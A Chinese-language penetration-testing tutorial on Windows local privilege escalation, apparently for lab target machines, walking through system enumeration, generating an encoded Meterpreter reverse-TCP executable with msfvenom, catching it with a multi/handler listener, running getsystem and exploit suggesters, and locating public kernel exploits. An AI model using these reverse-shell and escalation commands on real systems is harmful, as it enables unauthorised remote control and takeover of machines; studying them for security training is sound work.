# Windows内核溢出漏洞

## 内核溢出简介

1. 攻击者利用 **系统本身 或者 系统软件漏洞**, 获取Windows权限

2. 分类: 

   1. **远程溢出:**

      攻击者与远程服务器进行连接, 之后根据对应的操作系统的获取远程服务器的权限(Windows System).

      `注意: 这种溢出只有极其少数的人有, 例如一些大公司, Google, Microsoft, 还有一些国家机构才有. 相传有一个便可以实现财富自由.`

   2. **本地溢出:**

      这个是主流的提取方式, 攻击者通过上传`payload 或者 写好的 专门文件`  到靶机上,如果靶机使用的操作系统存在对应的漏洞, 则获取到 `Window System 权限`

   > 说白了, 就是要获取  `System 权限 或者 Administrator 权限`
   >
   > 此处, 介绍 **本地溢出**

   

# 本地溢出具体介绍

1. 信息收集

   > 通过查看缓存, 收集到靶机的信息, 例如: **打过哪些补丁, 系统的版本, 一些日志 之类的**

2. 根据收集到的信息 , 搜索并利用相关漏洞

3. 使用EXP提权.

## 演示操作

1. 假如现在已经拿到一台Windows , 则 查看系统信息

   ```shell
   systeminfo
   
   # 当然, 如果只想要看靶机修改过那些补丁, 可以直接输入以下命令:
   wmic qfe get caption,description,hotfixid,installedon
   ```

   ![image-20230415091220951](https://raw.githubusercontent.com/QDGSCLOUD/BJYH_picture/main/img/image-20230415091220951.png)

   

2. 确定系统权限, 看是否要提权

   ```shell
   whoami
   
   whoami /groups
   ```

   ![image-20230415091420132](https://raw.githubusercontent.com/QDGSCLOUD/BJYH_picture/main/img/image-20230415091420132.png)

   ![image-20230415091901537](https://raw.githubusercontent.com/QDGSCLOUD/BJYH_picture/main/img/image-20230415091901537.png)



3. 通过搜索和利用找到的版本和补丁的漏洞进行操作系统的提权.

# 配合工具使用提权演示

## 工具一: 利用MSF提权

> 使用 Kali自带的 `msf`

1. 进入到msf, 在Kali中直接输入

   ```shell
   msfconsole
   ```

2. 制作连接的 `exe文件`

```shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=靶机ip LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o testsystem.exe
```

> 将这个连接好的exe**上传到靶机上**就行.

依次输入下面的命令进行连接:

```
use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 靶机ip(与制作的测试的exe对应)

set lport 4444(因为msf默认端口4444)

run  或者 exploit
```

**具体操作如图所示**:

![image-20230415101856660](https://raw.githubusercontent.com/QDGSCLOUD/BJYH_picture/main/img/image-20230415101856660.png)



接着开始提权:

1. 尝试

```
getsystem
```

2. `getsystem`失败的概率比较大, 所以可以尝试下面的msf的两个插件,

   这两个插件不会直接提权, 但会检测靶机上 **可能存在的漏洞**

```
use post/windows/gather/enum_patches
```

```
use post/multi/recon/local_exploit_suggester
```

1. 搜索可利用的模块

   ```shell
   use post/multi/recon/local_exploit_suggester
   set session ID
   run
   ```

   ![image-20230415104030617](https://raw.githubusercontent.com/QDGSCLOUD/BJYH_picture/main/img/image-20230415104030617.png)

4. 接着, 直接通过命令提权即可, 例如: 

   ```
   getuid
   
   ```

## 工具二: Windows exploit suggester 插件 提权

> **具体步骤如下**:

1. 生成systeminfo信息的txt

```shell
systeminfo > test_systeminfo.txt
```

> 注意:
>
> 1.  `test_systeminfo.txt 随便取个名字就行, 只要是txt文件就行`
>
> 2. 因为涉及到 **远程连接并下载**, 可以 **考虑蚁剑**, 因为蚁剑中也有终端, 可以导出**systeminfo**, 然后再蚁剑中直接下载.



2. 下载和安装插件

   

   > 这内存大一点的盘符, 安装插件工具.
   >
   > ```
   > git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester
   > ```

   > 接着更换Python默认版本, 并且确认一下
   >
   > ```
   > sudo update-alternatives --install /usr/bin/python python /usr/bin/python2 1
   > ```
   >
   > ```
   > python --version
   > ```

   > 安装python2 的pip 
   >
   > > 先进入到 `/usr/bin `, 创建一个文件夹 python2pip.
   > >
   > > 之后进入这个文件夹, 依次输入下面命令
   >
   > ```
   > wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
   > ```
   >
   > ```
   > python get-pip.py -i http://pypi.douban.com/simple --trusted-host pypi.douban.com
   > ```
   >
   > ```
   > pip --version
   > ```

   

   > 安装插件所需要的以来库
   >
   > ```
   > python2 -m pip install xlrd==1.2.0
   > ```

   

   > 接着到 `已经下载好的插件下,运行工具`
   >
   > ```
   > python2 windows-exploit-suggester.py --update
   > ```
   >
   > ```
   > python2 windows-exploit-suggester.py --database 生成的xls文件名 --systeminfo 自开始导出的systeminfo的txt文件.
   > ```

![image-20230415115237147](https://raw.githubusercontent.com/QDGSCLOUD/BJYH_picture/main/img/image-20230415115237147.png)

![image-20230415115300127](https://raw.githubusercontent.com/QDGSCLOUD/BJYH_picture/main/img/image-20230415115300127.png)

> 这种情况下, 没找到漏洞.

> 这个插件工具的原理是通过新生成的 `xls`文件和 `拿到的systeminfo信息的txt文件`进行对比, 判断漏洞.

> 注意:  有 `systeminfo信息的txt`最好在 这个工具目录下.就是 **和  `xls`文件同目录**

补充一下: 下面这个是找到的情况.

![image-20230415120013976](https://raw.githubusercontent.com/QDGSCLOUD/BJYH_picture/main/img/image-20230415120013976.png)



## Wesng

下载地址:

```
https://github.com/bitsadmin/wesng
```

这个工具是在windows下运行的, 也是帮助搜索有哪些漏洞的, 和上面那个差不多.

> 具体使用: 
>
> ```
> python wes.py --update
> 
> python wes.py systeminfo.txt
> 
> python wes.py systeminfo.txt --impact "Remote Code Execution"
> 
> python wes.py systeminfo.txt --impact "Remote Code Execution" -e
> ```

# 工具三: 线上工具

网址:

```
https://i.hacking8.com/tiquan
```

```
http://bugs.hacking8.com/tiquan/
```

> 注意: 第二个可能用不了.

直接将 `systeminfo文件里的内容粘贴到输入框就行`

一直往下滑, 就可以看到查询的结果了:

![image-20230415121406730](https://raw.githubusercontent.com/QDGSCLOUD/BJYH_picture/main/img/image-20230415121406730.png)



# EXP搜索(直接下载就行)

```
https://github.com/offensive-security/exploitdb
https://www.exploit-db.com
https://github.com/SecWiki/windows-kernel-exploits
```

> 具体的使用的时候, 按照 **`Readme `**操作就行











